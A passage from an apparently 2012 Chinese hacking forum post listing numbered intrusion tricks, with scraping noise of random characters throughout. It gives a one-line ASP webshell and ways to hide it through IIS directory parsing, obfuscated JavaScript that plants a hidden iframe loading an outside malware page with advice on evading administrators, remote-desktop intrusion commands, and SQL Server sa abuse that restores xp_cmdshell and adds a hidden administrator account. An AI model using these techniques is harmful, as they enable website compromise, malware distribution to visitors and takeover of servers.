7 [$ `# y; f5 C用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。3 e/ ]/ @3 j3 C% m9 D {
5 u1 p3 `# `, z; b( P+ S53、隐藏ASP后门的两种方法
- P; A6 F. u. b! f f: n1、建立非标准目录:mkdir images..\
; T2 o) E) K) ]7 ?8 d$ R2 f拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp x6 R! ^6 Z6 z3 n: }* f2 O. c
通过web访问ASP木马:http://ip/images../news.asp?action=login
' F! [+ ~8 k8 q3 @9 [如何删除非标准目录:rmdir images..\ /s8 {8 k! T$ r5 p8 {
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
& h$ J, A* a, m" d. Y0 z Y4 Zmkdir programme.asp- N# w i1 m6 B; k1 @ X" m" ~
新建1.txt文件内容:<!--#include file=”12.jpg”-->% @" |$ Z: l- T1 X7 e+ ]
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
5 G' d4 r" }9 P5 y3 W+ ]1 @attrib +H +S programme.asp
. n( ]) }# S2 B4 t2 h% Z! Z# q通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt* u y' {) j# t5 R& o
) L* c2 h9 ^7 [% o& K' t, v( R7 B54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。5 r# s1 ^* D) d
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。7 w6 t7 o- X }' g: r2 C L1 g6 E
' }7 C, n1 y4 y7 L55、JS隐蔽挂马
$ K( l4 J$ ^# I6 b* b( K1." o u' I3 `# ^; n+ ^7 S8 G5 t8 R9 f( i
var tr4c3="<iframe src=ht";) ~4 B" f$ @: _( Q4 m
tr4c3 = tr4c3+"tp:/";
5 d E4 H, P5 x2 ^tr4c3 = tr4c3+"/ww";& E; e; o, Q9 n/ Q7 O* a
tr4c3 = tr4c3+"w.tr4";( @% T( X6 N" G. R4 y% u7 ]
tr4c3 = tr4c3+"c3.com/inc/m";
! P/ W, V1 O! [; ptr4c3 = tr4c3+"m.htm style="display:none"></i";8 p# b& \" K! \% t3 a
tr4c3 =tr4c3+"frame>'";
( v% \9 L1 q+ `3 Y- p2 [7 Bdocument.write(tr4c3);) V! T: o% @' I; e
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
9 [; h1 F8 [- B+ t5 w: r
' k* R( G3 w1 {: _4 a0 Z2.
f, k" k6 v; ~; h( [6 a转换进制,然后用EVAL执行。如9 P( z, R$ M, b# i1 m: z `0 V
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
0 u' |2 H |8 m- a不过这个有点显眼。2 U, ^8 n, n+ Z1 m. ?6 ^: Q/ Y q
3.8 I$ j7 T. n- x8 _% T0 [. x1 c% w
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
* B" U" k1 o g! I- I' D$ H最后一点,别忘了把文件的时间也修改下。
* d2 j" `2 M7 }/ M4 c8 H5 h
# l0 D* _/ [! g56.3389终端入侵常用DOS命令/ v/ V7 y* E6 ?; D' X+ S
taskkill taskkill /PID 1248 /t+ r9 o# ?( z; K: J* O
. W( b" Y, U' ]
tasklist 查进程
, z2 n$ J# K2 N) z& R5 i) F- }! Z# N& J0 ^1 H9 Z+ T" @& W
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
( `' ]. S2 j/ L' T. D' Eiisreset /reboot2 b9 Y, c& F- |) }' o
tsshutdn /reboot /delay:1 重起服务器# i/ M" C ]" [
" |5 x8 L% U$ V, A, \2 t( U
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,1 Y* h6 N0 F9 Y3 I9 |2 h( M. u
. N# _$ K f. {$ }query user 查看当前终端用户在线情况
: Z1 t: E9 \$ N! n/ O
7 O _* R" b" ~. d要显示有关所有会话使用的进程的信息,请键入:query process *
2 F( F+ Y3 L8 b7 \ h6 ]; ~: W" A6 l& |
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2. M% ~9 `- t. Z1 K3 t: Z3 s% |
: S% X/ c4 ]8 Y# E8 j( |
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER23 m6 M) s' Q3 a6 ^8 k- k
6 _; ~1 D( |, [7 r5 q
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
+ D+ L7 Z1 k; C+ `: v3 O8 {
: b% Y1 j- i u: J命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
* H% ?6 s# L: ^- c+ r: `- b; H2 A
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统$ d0 Z. k B" K( k' m* m- @( o
* A: C+ i- |( g% F% }! J命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
2 N- Y# X" v8 l. P) c- P/ K& U/ s2 V' n: S0 d- X' _5 K6 p9 Q
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机0 t1 @3 t. c/ F5 w0 |8 z
$ ? b+ y& I; h0 S8 ]3 n' a56、在地址栏或按Ctrl+O,输入:
" ^) g( d L" f- ^) u: p( j7 w bjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
1 [/ K% z- [; _: O0 v/ e. {2 p0 J1 i3 o. n; [3 J
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。: k! Y$ d: B$ A" k h' }
! I# P( h" d# y8 }57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
% e. A* Z M. [# T# X# F# w用net localgroup administrators是可以看到管理组下,加了$的用户的。, J! C8 h1 B0 j
$ p/ r1 @8 g4 u* J) i
58、 sa弱口令相关命令
8 B0 R2 x- i( M4 R/ c9 D
2 K |: O( c2 G一.更改sa口令方法:4 K- ~7 J; i c. O: x+ F
用sql综合利用工具连接后,执行命令:# q1 h: }& ?. ?& c9 _, p) [4 N4 z
exec sp_password NULL,'20001001','sa'
" B* F/ T/ X, ?8 N2 K(提示:慎用!)
) I3 j0 F+ W" @; j/ r+ F
* z/ x( [: |' U: o% n: V7 s- a8 s% O二.简单修补sa弱口令.
% s; w; E7 F) J' _& k8 U, t% [6 m4 q# K+ _- ~4 I" M* Y
方法1:查询分离器连接后执行:
# d0 E% K2 g" }; Y3 lif exists (select * from
4 ^: e" `3 J* [% V) F) ]dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and6 L0 @6 x/ s$ r: p! T; ?' P& L
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)7 y* g1 H6 k" M+ j# Y
0 k" x: |8 j$ e7 }. {
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
, k8 k) {2 e$ ~/ }* Z. d! u3 j- Z4 F( J3 E, B# Y0 @5 k
GO
2 H/ `, f% q% a. d& ^$ C7 V+ N
& z& R# [! A. |! P2 H然后按F5键命令执行完毕
; D$ n; ]2 M0 `* r, L$ Y
: P; m2 g) p6 R+ ~3 }方法2:查询分离器连接后
: u! m# l3 ~* j6 K第一步执行:use master
- m! }' X) G9 h P4 ]第二步执行:sp_dropextendedproc 'xp_cmdshell' E; `( l. m# @- P6 N
然后按F5键命令执行完毕5 ^' b" O/ l, @& r( {& n
& _ a/ r) Y4 y6 H0 i F* h1 \* `9 L/ x, ?7 t
三.常见情况恢复执行xp_cmdshell.
8 \: R' Y4 K: _# H( \5 F/ q5 s7 N& U" b5 u/ ]
' ~' ?: _7 k$ l" t: h( h1 未能找到存储过程'master..xpcmdshell'.
- A& c5 d( E) A 恢复方法:查询分离器连接后,
% `9 M9 n1 f+ ^8 n$ G3 v/ a第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
* x. d6 X7 R2 m8 A第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
; u* H% ?& w3 R# q! y然后按F5键命令执行完毕
& J9 A) P3 s6 s% O0 o# w
9 {2 m: Y1 ]0 y2 o- p; }2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
8 S2 |. s: Q% M% C0 i恢复方法:查询分离器连接后,/ M4 i& q5 |; j2 h# }3 }& O9 I$ e
第一步执行:sp_dropextendedproc "xp_cmdshell"
0 d& \) |9 ^) i6 w5 w. u. j第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
/ ?, c, j4 Q% V7 V; }/ M+ x然后按F5键命令执行完毕
( s# `7 C7 N3 c* N* a7 k" W0 k w& Z9 Y* ^' U, {
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)+ n- \; W7 E1 ], X9 L# \- y
恢复方法:查询分离器连接后,& i, L5 I5 Z Z5 t! Q: X( v
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
; k8 E7 H4 f0 K; Q" i第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' 2 l' p( \# W6 H' l/ y
然后按F5键命令执行完毕6 X! M5 {3 R) B% b
4 a4 D/ f% |: W9 r# Z. f2 W, R1 q
四.终极方法.1 ]" m" S( @! b# Z7 A Z6 y' F7 U
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
* [% H5 j1 C v# T# N查询分离器连接后,; T' g5 k9 |" i& h8 G
2000servser系统:
/ `- q. F1 \2 p) Kdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'6 S+ s# A+ Q; i6 O3 t' N3 k, Y$ l5 e
* V: L7 }3 i9 g$ g3 q( S# c3 S$ @/ V5 ?declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add': s' \2 c+ ^2 T- H4 n& }
* E' e) C5 h, C6 v' t9 k' j2 Lxp或2003server系统:; y$ R# P' b6 g# m
3 Y+ u* b" U+ v; edeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
) O! n% S U+ }. v- Q% O, v
0 R% ?& g' R. y6 q: Ldeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'3 x3 b- K# h. w
|
发表于 2012-9-15 14:51:03
收藏
支持
反对